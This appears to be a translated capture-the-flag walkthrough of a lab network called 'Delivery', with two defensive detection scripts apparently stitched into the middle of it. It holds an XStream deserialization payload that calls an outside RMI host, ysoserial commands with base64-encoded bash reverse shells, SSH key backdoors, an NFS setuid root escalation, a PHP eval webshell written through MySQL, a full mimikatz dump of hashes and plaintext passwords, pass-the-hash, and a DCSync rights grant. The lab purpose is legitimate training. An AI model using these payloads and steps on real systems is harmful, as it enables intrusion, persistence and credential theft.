春秋云镜 (Chunqiu Yunjing) - Delivery

flag01

Test the security of the Delivery web application exposed on the public internet, and try to obtain the ability to execute arbitrary commands on that server.

Run fscan against it first.


The scan shows an FTP service with a weak password.

Connect and take a look.

1.txt is empty.

pom.xml:

```xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>140.143.143.130</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>140.143.143.130</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
```

XStream is clearly in use here.


A quick search turns up CVE-2021-29505.

https://blog.csdn.net/qq_42430287/article/details/135229815
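From the defending side, the document above is recognisable before it ever reaches XStream: no ordinary data object contains an RMI registry stub or a JNDI enumeration. The following script is an added example (mine, not from the write-up or from XStream) that walks an XStream XML document, flags class names belonging to the RMI registry gadget chain shown above, and extracts the registry host and port the chain would connect to. The class list is taken from the document above; the sample input is a trimmed copy of it and a constructed benign document. In the application itself the real fix is XStream's type allowlist (`XStream.allowTypes` / `allowTypesByWildcard`) and upgrading to a version that fixes CVE-2021-29505.

```python
"""Flag XStream documents that carry RMI/JNDI gadget-chain classes.
Added example; detection only. Class names come from the gadget chain
shown in the write-up, not from a full XStream blocklist."""
import xml.etree.ElementTree as ET

# Classes that appear in the RMI-registry chain and have no place in
# a normal data document. Tag names use XStream's "_-" encoding of "$".
SUSPICIOUS_CLASSES = {
    "sun.rmi.registry.RegistryImpl_Stub",
    "com.sun.jndi.rmi.registry.BindingEnumeration",
    "com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl",
    "javax.naming.ldap.Rdn_-RdnEntry",
    "java.rmi.server.RemoteObject",
}
# Package prefixes that are suspicious even when the exact class is new.
SUSPICIOUS_PREFIXES = ("sun.rmi.", "com.sun.jndi.")


def _class_names(elem):
    """Yield every class name an element carries: its tag and its class= attribute."""
    yield elem.tag
    cls = elem.get("class")
    if cls:
        yield cls


def scan_xstream(xml_text):
    """Return the suspicious class names found and any RMI registry
    callback (host, port) pairs referenced by a <ctx> element."""
    root = ET.fromstring(xml_text)
    hits, callbacks = set(), set()
    for elem in root.iter():  # iter() includes the root element itself
        for name in _class_names(elem):
            if name in SUSPICIOUS_CLASSES or name.startswith(SUSPICIOUS_PREFIXES):
                hits.add(name)
        # The registry context names the host and port the chain would dial out to.
        if elem.tag == "ctx":
            host, port = elem.findtext("host"), elem.findtext("port")
            if host and port:
                callbacks.add((host, int(port)))
    return {"suspicious": sorted(hits), "callbacks": sorted(callbacks)}


# Trimmed copy of the document shown in the write-up (constructed test input).
SAMPLE_GADGET = """\
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default><size>2</size></default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names><string>aa</string><string>aa</string></names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string><string>140.143.143.130</string><int>1099</int>
</java.rmi.server.RemoteObject>
</registry>
<host>140.143.143.130</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
"""

# Constructed benign document: a plain data object, nothing to flag.
SAMPLE_BENIGN = "<com.example.Order><id>1</id><customer>alice</customer></com.example.Order>"

if __name__ == "__main__":
    print(scan_xstream(SAMPLE_GADGET))
    print(scan_xstream(SAMPLE_BENIGN))
```

The prefix check deliberately goes a little beyond the exact class list so that a re-arranged chain using other `sun.rmi` or `com.sun.jndi` classes is still reported; an allowlist in the application remains the real control.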

Use ysoserial's JRMPListener to get a reverse shell.

```bash
java -cp 1.jar ysoserial.exploit.JRMPListener 1010 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDAuMTQzLjE0My4xMzAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"
```

Payload:

```xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>140.143.143.130</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>140.143.143.130</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
```

The shell that comes back is already root.


flag02

Same routine as always: set up frp and run fscan.

The earlier reverse shell got dropped by a slip of the hand, so add an SSH key as a backdoor to be safe.

```bash
echo 'ssh-rsa ... root@kali' > /root/.ssh/authorized_keys
```


```text
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.14:22 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:21 open
172.22.13.28:3306 open
172.22.13.6:445 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.6:88 open
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456
```

172.22.13.14: entry host

172.22.13.6: DC (domain controller)

172.22.13.28: domain-joined machine

172.22.13.57: pivot host

The hint says NFS is the way in.

Download the offline nfs packages (nfs_offline) onto the target.

nfs_offline_install.sh

```bash
wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
```

```bash
showmount -e 172.22.13.57

mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock
# write the SSH public key
ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys
```

Compile a small C program and make it SUID root.

```bash
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root
```


```bash
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Run the SUID binary to get root.
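The whole NFS step rests on one export setting: with `no_root_squash`, root on the NFS client is root on the server, so a root-owned setuid binary can be planted from the client and executed after logging in. The write-up does not show the target's `/etc/exports`, so the script below is an added example (mine, not the write-up's) that audits a constructed `/etc/exports` for exactly those conditions: exports open to every host, `no_root_squash`, writable exports of `/` or home directories, and `insecure` ports. The remediation is the inverse of each finding: `root_squash`, a client list instead of `*`, and read-only wherever a root or home export is unavoidable.

```python
"""Audit /etc/exports for the settings that make a planted setuid binary
over NFS possible. Added example; the sample exports file is constructed
and is not the target's real configuration."""
import re

# client spec looks like  host(opt,opt)  or  host  or  (opt)
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Parse exports(5) lines into (path, client, options) triples.
    A missing client means the path is exported to every host."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]
        for spec in clients:
            m = CLIENT_RE.match(spec)
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, client, opts))
    return entries


def audit_exports(text):
    """Return one record per export entry with a list of findings."""
    results = []
    for path, client, opts in parse_exports(text):
        findings = []
        if client == "*":
            findings.append("exported to any host")
        if "no_root_squash" in opts:
            findings.append("no_root_squash: client root is server root")
        if "rw" in opts and (path == "/" or path.startswith("/home")):
            findings.append("writable export of / or a home directory")
        if "insecure" in opts:
            findings.append("insecure: accepts requests from unprivileged source ports")
        results.append({"path": path, "client": client,
                        "options": sorted(opts), "findings": findings})
    return results


# Constructed sample: first line is the weak pattern, second is a sane one.
SAMPLE_EXPORTS = """\
# constructed sample, not the target's real /etc/exports
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/share   192.168.1.0/24(ro,sync,root_squash,no_subtree_check)
"""

if __name__ == "__main__":
    for rec in audit_exports(SAMPLE_EXPORTS):
        status = "; ".join(rec["findings"]) or "ok"
        print(f"{rec['path']} -> {rec['client']}: {status}")
```

`showmount -e` from a client shows the same export list the server advertises, so the audit can be run against that output as well as against the file itself.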


flag03

Next, go after the MySQL server found in the internal scan.

Connect with Navicat as root / 123456.

```sql
show variables like "secure_file_priv";
show variables like "%general%";
```

The service is started by phpstudy, and files can be written into the web root.


```sql
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
```

Connect to it with AntSword (蚁剑).


flag04

Just this one left.

Credential dump from mimikatz (sekurlsa::logonpasswords):
Authentication Id : 0 ; 8786969 (00000000:00861419)
Session : RemoteInteractive from 2
User Name : Q1ngchuan
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* NTLM : 397cb3952d50a1e29ee3308179c0ff81
* SHA1 : 330f6c01e54ee24d8dccb230712ef60361a0e2f4
tspkg :
wdigest :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 8764753 (00000000:0085bd51)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 92043 (00000000:0001678b)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/11/7 14:52:57
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :

Authentication Id : 0 ; 52638 (00000000:0000cd9e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : b5cd3591a58e1169186bcdbfd4b6322d
* SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
ssp :
credman :

Authentication Id : 0 ; 52616 (00000000:0000cd88)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 23854 (00000000:00005d2e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/11/7 14:52:54
SID :
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 8786998 (00000000:00861436)
Session : RemoteInteractive from 2
User Name : Q1ngchuan
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* NTLM : 397cb3952d50a1e29ee3308179c0ff81
* SHA1 : 330f6c01e54ee24d8dccb230712ef60361a0e2f4
tspkg :
wdigest :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 8764822 (00000000:0085bd96)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 92022 (00000000:00016776)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/11/7 14:52:57
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/11/7 14:52:54
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Pass-the-hash to get SYSTEM.

```text
sekurlsa::pth /user:WIN-HAUWOLAO$ /domain:XIAORANG.LAB /ntlm:d3b77fdc91060b08a3d6288e9ef6348c
```

Collect domain information with BloodHound.

```text
SharpHound.exe -c all
```

Grant chenglei DCSync rights.

```bash
proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6
```
